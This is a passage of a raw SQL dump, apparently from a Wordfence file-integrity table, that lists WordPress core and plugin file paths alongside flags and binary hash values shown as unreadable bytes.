a�Ȑ��2TQ�Ls�\0�ڠѸ&=:@\'','',0,'?'),('-\\��[�����J�ץ','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�1���	�M����]�','��A8��{�!��V�t<S��qH�oh�4��y`By�','',0,'?'),('-jާ� �����~hyb','wp-content/plugins/wordfence/lib/menu_support.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ɚ__#����~<R3�','����t]s\r4��0�6T퍪w܁gB��~B','',0,'?'),('-kdϯ���X�w\\7���','wp-includes/admin-bar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��f�ہ���jV���J\"','q`�����]�;\\�݈1�uł�䫔�[','',0,'?'),('-w�T��r�Y��90�y`','wp-content/plugins/wp-cerber/cerber-request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�xf�ڒ�k�Di��','�� f����7�6��\"������`)���','',0,'?'),('-����Ǹ�%w=��','wp-admin/css/colors/ocean/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������V�*,^b*$�','nh�ᷘvU�?D��4��w�Zq������w_','',0,'?'),('-��w�3�(\"O5kds�','wp-content/plugins/redirection/README.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','--�\"7��2�ZZ','+�z2&��?Ev1R\n�yʊ��\Z��','',0,'?'),('-���_���mq+��1�','wp-content/plugins/wordfence/modules/login-security/classes/model/settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h㠲���i�e��ɡ','IH�Mp\\��N�h\n׈N��F=-���Z�=hO','',0,'?'),('-��)7�5y�8c��Wv�','wp-admin/about.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';��X���\"�)5Đ�','.�s���5P�G�M��	��.���3���','',0,'?'),('-�_��+��Yn��S','wp-includes/js/jquery/ui/tooltip.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�\r��c5V����h','+*5�~oѼ�>�\\Z������c���l�','',0,'?'),('-�f��4]�#\"u��l','wp-admin/css/colors/light/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�20���d#�k�$f�D�','�w��4Uދ�K`V��i��ɸ	 l����̡7','',0,'?'),('-��藂��Y{]ns�','wp-includes/css/wp-pointer.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�U�Y�D�K�z�c','>�;��]ۼH�Ֆ&�ݟ�������`;�','',0,'?'),('. �\0_oE�]A�_�0PJ','wp-includes/js/tinymce/plugins/wpautoresize/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K�.�Aj_�m�r#i�','\'��C��b\"B��\\�N�N���*r&.X��J','',0,'?'),('.IhU���3��+B\Z��','wp-includes/images/admin-bar-sprite-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q����8��o��','*E��Ts���al�^�p��X���Z\0��','',0,'?'),('.x��Ϯ�7����_�','wp-includes/js/mediaelement/mediaelement-and-player.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\"���\n�-ۤ�Y','$9~�=:����Z�F�m}�A�5ks�	V#� �*','',0,'?'),('.�麉D0�u�L-c�','wp-content/plugins/wordfence/views/options/option-toggled-segmented.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���B�W#��#���','�^�<��4��e,��\0��l�����\r�!d','',0,'?'),('.�=��$��.�6��(','wp-includes/blocks/button/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�Q�h�]�nF�M>�','��1=��a4���\\��z�m�h~�e�;)\n?>','',0,'?'),('.�E�[J��l�x��','wp-content/plugins/wordfence/images/forward_disabled.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M_��Z?�N)�Ҋ�:�5','���/�<>O&�ȕJR݇e�}�(��m','',0,'?'),('.��7�f�w9Pm@����','wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/jwt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0�H�#�IHD���','�v�o�VYx�?���\n��\n&3c-\r�8�m��','',0,'?'),('.��	r��\Z�Q���','wp-content/plugins/wp-cerber/assets/flags/gm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S\'�A)����zU$',']�Z��!�p������1�{f��^EQ3sH','',0,'?'),('.��Ϡ�a?馺W�8ӵ','wp-includes/rest-api/endpoints/class-wp-rest-pattern-directory-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U<j��)�뷙�d\Z{','�|F����I�p���N+){S)�Ot���~O�','',0,'?'),('/*:����o>�t����','wp-includes/js/dist/autop.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s�H����#ƨpB�]','���7\Z�őp:���HB[�3���ߔ?-�5(','',0,'?'),('/++�%̀�4y@cUI�','wp-content/plugins/redirection/models/file-io.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���i�H�f\n��F��','�i��>�+9\"��[ycu��6��dzm-�b0B','',0,'?'),('/<ا^ɼf}�\"��$�','wp-includes/images/media/document.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�4�8�Αy�6�d�','��ø`�������f	I$ _Z�X�\"0\r��,','',0,'?'),('/@���~�Ip�� ��','wp-content/plugins/redirection/redirection-version.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�r Z�C���U��`\"','�l99��Dɠ�24�^K�O=g$`hN�G\'Z�','',0,'?'),('/����\r���K^���','wp-content/plugins/redirection/matches/from-url.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\")Y��VV���Oa|[�','�p�\0l0��L/ݫ�ؽ#����e\0��D:P�','',0,'?'),('/��}㦿L�;?�w\\','wp-includes/Requests/Exception/HTTP/401.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.��o��X�N���R�','YV$���/���@=������V-��dc�','',0,'?'),('/�s��C4�������','wp-admin/network/setup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	w�����T�A;�}Ad','��韌�\'�MN�+�ƺ�R����g','',0,'?'),('/鹠���ΰ1�iw��','wp-includes/images/uploader-icons-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���&-��O��Õ�~','���r�\0����\'_>��6��QW��4ڠR��','',0,'?'),('/��f��P�j>X��','wp-includes/sitemaps/class-wp-sitemaps-renderer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V}d��T�ܧ�C\"º',':�i��K��,�c}i1�d��4l�c�2Œ�2','',0,'?'),('/�����5SQU۶v+�','wp-includes/rest-api/endpoints/class-wp-rest-autosaves-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ni���R�7�\"��j�O','DQ�I!c�̚��d��-&�e�]B���7','',0,'?'),('01���$��t���/�','wp-content/plugins/redirection/locale/json/redirection-es_MX.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���IHc$3�+��','��{��\"c��!�Q-{@�)�\\M�t^q\"$�C','',0,'?'),('0<����lڿ��J��','wp-includes/js/wp-backbone.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K�/�����7���b','���9J7�A���G���uq!@/nS]�<o�e�}�','',0,'?'),('0]�qK\'�f�x����','wp-includes/js/tinymce/plugins/compat3x/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�{��p�׶�Ҡ','��m�澑�[�S3��\'�J�*��Sts�j���','',0,'?'),('0j�Vƽ�f:�5��`�\\','wp-includes/js/customize-selective-refresh.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�G�埳6�0�b�','G���i�A�w_�P�g�9����Oɓ��M�','',0,'?'),('0x�h��ͭK��3��T','wp-includes/class-wp-fatal-error-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�tGM[��@̻��/f','��5�$�z�@�R�n�cd�����w��','',0,'?'),('0����a�O�ZI|I�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/SecretStream/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W�HY ��²��','zI]�_�Dz��!�bш�6�d�uY�3','',0,'?'),('0����k� ?ޞ���','wp-includes/js/jquery/ui/effect-scale.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',ʡ0��\\K4\'��t�','Ұ�-yߎf+�)�R��q[t�QJ��Z ?','',0,'?'),('0��<K�}�����ׇ','wp-includes/blocks/image/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4������h�a','`ƛ\"Gj�s-с]�5�l�YYF�f���U|V�','',0,'?'),('0���E\00���X�H','wp-includes/js/colorpicker.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m{��>l�Z�կ��','��\'�ۚ�c覯z+�*��S8\"�� [�귲;�','',0,'?'),('0�dۦZP�2��o�','wp-content/plugins/wordfence/lib/menu_firewall_waf_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ս$����6�\"�','��^h\'z�[��j���ӊ%\Z�pã��j.�S','',0,'?'),('0�ň����}m�X9�q','wp-content/plugins/wp-cerber/assets/flags/zm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\\|e�D�gk�^���','�yЩ&VUą;�}��D4E���3�)\\','',0,'?'),('0����I��\Z8�\'�x','wp-content/plugins/wp-cerber/assets/flags/tk.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ȕ��n��e�Y�T��','I��/�:���5s ;�#bi)��4k ����','',0,'?'),('0�i��LS� �q���','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-firewall-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\n�\\���&4�h�','�Ꭴ 6����1|�@\"��6��d�%w��G','',0,'?'),('0��$X8F�nŃk���','wp-includes/js/dist/vendor/wp-polyfill-dom-rect.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Մ�;vD�$:�~ƌƗ','��\r��|+���mA��I���O<�(��N�\r�g','',0,'?'),('1!� I��<Em#','wp-content/plugins/wp-cerber/assets/flags/ee.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|��h�~�\rO�����','��R�Bᣛ�݇84ɐ6B����\0ȸ�:l-�IB','',0,'?'),('1j�S�JmQ��s��7','wp-content/plugins/wp-cerber/languages/wp-cerber-pl_PL.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��L��X�p2�_d\0','Ea�o�\Z��zz=2�c}���8���ǃW','',0,'?'),('1-�����g97���','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/error_polyfill.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P�B���.��}�F�','��c�(����k1�����2�Qw4��?0','',0,'?'),('1?o�x��<�?���6','wp-content/plugins/wordfence/views/blocking/option-bypass-redirect.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?v@�Y�a�p�v���','p���ZʇO�F�M��4�V92�QP��\0����','',0,'?'),('1Ag\r%�1��kp','wp-content/plugins/redirection/actions/url.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u��7��銡d��V','Q�����J3��2�Aؿ�‹�N�u�+TR܊$�','',0,'?'),('1G�[��D��qW�t��','wp-content/plugins/wp-cerber/assets/flags/gy.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q��B��}��>_�','L�:�,���B[���aa<���w�*@������','',0,'?'),('1s�)6�Ӷ���C��Η','wp-admin/user/admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T^�1�����A�|','Y��%մ9����N��?\\v\\a��M���~݋','',0,'?'),('1�7�F0ܩ��^ �l','wp-content/plugins/wp-cerber/admin/cerber-tools.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��uCī�(��ekڵ�','ǹ�l���R��\Z���bf��$�hq����','',0,'?'),('1���pa�`H0ߢ�e','wp-includes/js/dist/url.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-LS|}�a�����5�','f���\r��\Z�Aa�m��#��O�����[�_�','',0,'?'),('1БY���4I^p�','wp-includes/sodium_compat/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`q8�2�G<A9\ZQ�',']�T=�76uN&=8W<�%����','',0,'?'),('1�EfQ�v#)�\n�0EkQ','wp-admin/images/media-button-image.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���m�	\'���A','iķ��z[����/\"� X���{�o��:��','',0,'?'),('1��X�/�t60^Ҁ!�7','wp-includes/js/comment-reply.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';Yó8y�F0��P^','�o��%cܫԕ-��zt�����Qs��<{�','',0,'?'),('2J�y*�m����]W','wp-includes/js/dist/a11y.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D5*dQ&8W.����I\0','yc�E�`��w}�%�4sug�Mľ~\r�I�ˑ \Z','',0,'?'),('2b�U��\0��s�pd0�','wp-includes/js/clipboard.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|�a�d]��.;��W;','zD�!X��s��)ؑ����3�l,��l�Q�CJrU','',0,'?'),('2&M�V?fĐ�m���','wp-content/plugins/redirection/locale/redirection-fa_IR.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z)V�ݐ��J_��Ҝ�','��1̚I�o{��\Z�lR\'|�+��F�\n���','',0,'?'),('2?��k�>�\"J]Sa!','wp-content/plugins/wp-cerber/languages/wp-cerber-zh_TW.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�hoĠAј����','t�F>E�:�\')9`���u��ě��W�','',0,'?'),('2@�j�j\0�kӲ��Ә','wp-admin/includes/template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	�APZ��в!��Yx��','����T�8��iʅ��{`br�8���O\'��','',0,'?'),('2D��%�J����?��\Z','wp-includes/js/dist/wordcount.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{ȦAr`�{��F�F��','o�V�F�p��7�h`��\"Ǘ�j��E���=�','',0,'?'),('2Y� ��oq&�Z���','wp-includes/class-wp-block.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ݕ��Fԯ�8f�6��','�����y{���tl+RJ���N��\nj�R','',0,'?'),('2gl�bC�d�M`H��','wp-includes/css/dist/block-library/reset.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ͤ;���a���\n��eQ','\'��l�CPh2��C :�\r��}/�tp�8,�1','',0,'?'),('2j�L,���W\r��W$��','wp-admin/css/colors/sunrise/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ir�~�����|�','U:1\0�^��p���ˌ�\r|F��t懳T�#�','',0,'?'),('2r}�V�ĥ$^���n/','wp-content/plugins/wordfence/css/images/ui-icons_777777_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�^n=(��&��݂�N&','S��DIB�z�_-?(Y��pE�y�ƹA�','',0,'?'),('2���8�`�/J�t','wp-content/plugins/redirection/matches/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>z�~C(Mغ�~�','j�QE߆ؾ�7�%��Fl�T\"�&��m���\'','',0,'?'),('2���!C|�R4�ض�J','wp-includes/blocks/paragraph/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%�)v���k \0��','H����к_W�\Z#� �K�߂�t]VL���Iʪ','',0,'?'),('2�E���γŷ���','wp-content/plugins/wp-cerber/assets/flags/ps.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��I��P-�6@%','%�AD���E���P�Ǖ��|�u��Ć�C�!','',0,'?'),('2�|�΢(ủt��T��','wp-admin/privacy-policy-guide.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������K8ۨ��)','.�%�����]:/$zԢ��S�_�)kER��','',0,'?'),('2��㺨a|F�l3]�','wp-includes/customize/class-wp-customize-new-menu-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	�sL2/�B�����','H\'�s�ӽ����I�$��Ӧ�ͤ�X�!�','',0,'?'),('2�v��\'��9\r��z','wp-content/plugins/wordfence/css/images/ui-icons_555555_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p��bD�@p�G+��','*DZ�>�Bg�&Y�Y������4(<�/','',0,'?'),('2ģ��_�D�x���','wp-content/plugins/wordfence/views/common/block-navigation-option.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O�����~�}t.�K','M�N��������F`\r9���ӫ�rP�,Q','',0,'?'),('2��1�����)�nZ','wp-content/plugins/wp-cerber/languages/wp-cerber-pt_BR.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����5�����N�','�^�?�t}�?�Ce�A��pr3C���<m','',0,'?'),('2��Zs��+z��','wp-includes/css/dist/block-directory/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#��ܕO�D~�r0M\0m}','Ms���w	o�d`�/�<��1�@��\'}���','',0,'?'),('2�0mK�:r²\\0\nB�','wp-content/plugins/wordfence/views/options/option-toggled-boolean-switch.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x���9/��Z�h�6�\n','�J<<���x?�#�o������Jn8�:j��','',0,'?'),('2��^(��ʭ�-^x��','wp-includes/SimplePie/Enclosure.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��(2ROf;Vkj�','�������`�.۾H�,�x1���8q?�L�}]','',0,'?'),('3)e/`���/\r�Ph=','wp-content/plugins/wp-cerber/assets/flags/bf.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ��>��=��$�.��','�Ȋ:��h�.�n(xD⃪F\"{`iN�\0#��','',0,'?'),('3+z��.���6Q~]y[','wp-includes/js/tinymce/plugins/wptextpattern/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#�R?�\"�`�$�`','!	�n�‚�śU7B��5gr�	1�*;R�','',0,'?'),('3h���\"I+[��E','wp-includes/js/clipboard.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G]��n�ma��sī�','��o~�S�$�	L��ޮ\'�2����l�r','',0,'?'),('3k��oW�5	k[mq','wp-admin/includes/continents-cities.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pg\Z*����Z�\0H4|�','���r}\n�w�u�Z�2�}KX���/��','',0,'?'),('3p���\\�8�lD�q','wp-includes/sodium_compat/namespaced/Core/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';��*�kLwB��d�=','ec[d�M?H�|�KY�\04��@� QA��:FF �','',0,'?'),('3z\'�O��v�J&�� ','wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6�z#�� �Btz���','5wm�[EGj\"�\Z\Z���@¨,%�B�iAn��-�','',0,'?'),('3�S�#ǣ+Ke�\0Ⱦ','wp-content/plugins/wp-cerber/assets/flags/la.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3MU\'���\Zkr�c&��','[�lԬ�`�l !_���>�kwd�X��p���_','',0,'?'),('3��JΑTg�0��\'e','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Base64/Common.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`4���uB\nE�#@��W',')r�xUYJ�;hpjH{\\����1\'#�� s�','',0,'?'),('3���\'���RK�Bf�','wp-includes/js/tinymce/plugins/wpdialogs/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','QO1�/<�>%\"�X��','�6�r�*�IY\0�C�9<��Jږ J*�xD','',0,'?'),('3��fQ3�h�5[��W�<','wp-includes/Text/Diff/Renderer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� �C0�Y7O�@�GS','EWj�+��\\��=����}.��1\r��|','',0,'?'),('3���औO�5(�','wp-includes/theme.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t(�Wq+U�	�ȝ�\0w',';��zV�]P�[�\'�4�OJ{\\�J�T��5K1c','',0,'?'),('3��ng\0��\\\0	�W','wp-includes/IXR/class-IXR-value.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��f�>�5l�j\0f�','�?h����͇ X��UP�O|H$�1���','',0,'?'),('3���g���BP��O','wp-content/plugins/redirection/locale/json/redirection-fr_FR.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\r�j6��Ӷꡐ��','��H9>�����f�\Zjf���\\��`g��Q��','',0,'?'),('4\n��	m�]Ŀ�Њ��','wp-content/plugins/wordfence/views/scanner/issue-easyPassword.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!��{\\� d����`�','���ǿ\'�ɜ�LҪ�B>���	&-�{���','',0,'?'),('4��$1AV�Re\r��:i','wp-content/plugins/redirection/matches/user-role.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1U��\"1��X�e�/��','��G4)�A�\'I�r(�\"蓴�d�F_�\Z��','',0,'?'),('4�31@�*r�����8','wp-includes/sodium_compat/namespaced/Core/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ś�L�\\�Pڜ�U','c>�5�o�������𽃐�_�T9�L~;�e7�','',0,'?'),('48�Vt���+^X�','wp-includes/pomo/mo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!	/�\"۵�$=�iU�','\rh�s�c��6Z$���P͡�\r!W%vD�~��j�','',0,'?'),('4;`߯z�?	�{Ǟ@','wp-content/plugins/wordfence/images/2fa-whole.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h»����$\ZPfX�','�ƪɝ����U[Z~��^�d�\'�X�ٮ���','',0,'?'),('4AI�n09��7c`','wp-includes/js/tinymce/utils/validate.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CL�1?o+;���{Y�','k�H��;�\0�kC�s�	\'K�#45+eE|���0','',0,'?'),('4To���iE��t�','wp-content/plugins/wordfence/views/blocking/options-group-advanced-country.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7�s\r>J��(���E�','�K����(w��B$�\r�s��줇!�ਿ��D','',0,'?'),('4Y�2$4�EUF�3M;�','wp-content/plugins/wordfence/js/jquery.tmpl.min.1629122067.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\}�\"���7ڷ��DZ','�.I�H\Z�g\0�H!7`��gޠZ�zȄ�ž6|','',0,'?'),('4a�[I�}���H�m)','wp-admin/css/deprecated-media.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M>��_�^�����9F','.��*�AU�u0�	\'�Q�2˻�=�x4w��g�','',0,'?'),('4�qEyVS/��o}�','wp-includes/blocks/tag-cloud/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iCu�k�0)������\"',' H����>�W��!ס�Ȼ�e�h��d\r�-�Ҭ	','',0,'?'),('4���X.-Ӳ��\nAJ','wp-content/plugins/wordfence/languages/wordfence.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��s�{��Iat:�/�',')�=炁h^V�9I���u��\\�<�\"��Y��','',0,'?'),('4ڂ��L$�,K[�u��','xmlrpc.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A�8\nP*�a|/ٳK','XdB�c\0���2��Ý��c���g�������','',0,'?'),('54��Z�ʗ�HJ','wp-includes/blocks/rss/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*��\"�s�~�^�n','�A+�ݍ�D-� f-o��O����f�','',0,'?'),('5�?��y��<�2�','wp-admin/css/dashboard-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m��)����.z�','�\0\\��3\n�4�A7�ݜ�&j3R��J?z��o�','',0,'?'),('5.=���d)<p�eu�s^','wp-includes/sodium_compat/src/Core/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}��][W�)�B��y�','e3\nx��&\\āk���٦�|���V��s��','',0,'?'),('56AA���ѹ�A\r	�','wp-content/plugins/wp-cerber/languages/wp-cerber-cs_CZ.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C�[��w�׺]Q��J','��U7�e:�%�\Zp^���\r=��B���dc�}\n','',0,'?'),('58�d�`S61K>ۮ�v','wp-admin/css/colors/blue/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L\"���\"�6��3@�','��4��_�wl?�\\�	p�Q(�#���y9�ͼ�','',0,'?'),('5C�)\nWu�꽝/F�cK','wp-includes/js/plupload/wp-plupload.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bi�^�̹�$�x�9}z�','3}�ʞi�����8]`���Q���ଧ%6','',0,'?'),('5S{�TƁ���e�/�','wp-includes/class-walker-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ئ�:6[�>r>��S','������`�������\"}���j�\Z\ru���','',0,'?'),('5Z����Sμ�v�`6�9','wp-includes/version.php',0,'/8r±�!�C��N�ש','/8r±�!�C��N�ש','A.�8�%���*Ȧӿ��A�5�����C��','',0,'?'),('5\\h>��w	���N�','wp-includes/registration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���S��D��31�','ՙ���vF��٫���P��B8.�����8�','',0,'?'),('5`�]\\ͭi\0���\ZJ�T','wp-includes/class-wp-embed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CCZb�2�h�:�d׊','c�n�V�0E<\'�x�/sJ�Ϙ��*0�\n�	�','',0,'?'),('5n%�.TIͳ�\Z��B�','wp-content/themes/newsmagbd/vendors/themify/themify-icons.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x�	.���i��j^�U','����-��,�gaɮbu��������L�7޾','',0,'?'),('5vQS\0zX���B^���','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-pt_BR.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ؒ�ț�:��4k�W\\�','_��p�W�Ʋ�fs�r���;\"+�K+��o��bx','',0,'?'),('5��92���^�%<��','wp-admin/edit-form-blocks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��F]?��{��Eq��t','v/!��h8WL�kW�]�,�\Z�p3R�wW6k�B�','',0,'?'),('5�7�N	C=��-��c�','wp-content/plugins/wordfence/images/sort_asc.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&�D�K���zS§0','N�Q�*��TZ%P��%���jܑtZn/�','',0,'?'),('5�#t�5R�шK����','wp-content/wflogs/config-livewaf.php',0,'�~�J�I~�r	�d��','�~�J�I~�r	�d��','�(\\\Z����x�^���pV�_\'q\'m[_�5�d�','',0,'?'),('5�M�6:�Ӷ���,','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-sv_SE.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:X\\%?����ӥ','��ٜ�d��Xŀ�x�h��M��vw�$8','',0,'?'),('6����X/��HL','wp-includes/js/mediaelement/wp-playlist.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����X�l\"�o�','�/=àBAo&���I�1��]k~�N���','',0,'?'),('6c�k���6_sx$�>\"','wp-content/plugins/wp-cerber/assets/flags/et.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8������ZltS���\"','c��/s]\Z�`R��ꩧ`���֌�E�����P�','',0,'?'),('6;I(�H�m�%��f�','wp-admin/css/farbtastic-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7\n���)�{��','T�=�Y#��[���vr�H�ia��R���','',0,'?'),('6W(\'�����P�4�','wp-content/plugins/wp-cerber/assets/flags/gn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������M�MH����,','����nr���A�[/�Á����*f|DeTJC�J','',0,'?'),('6[f�9�?�� 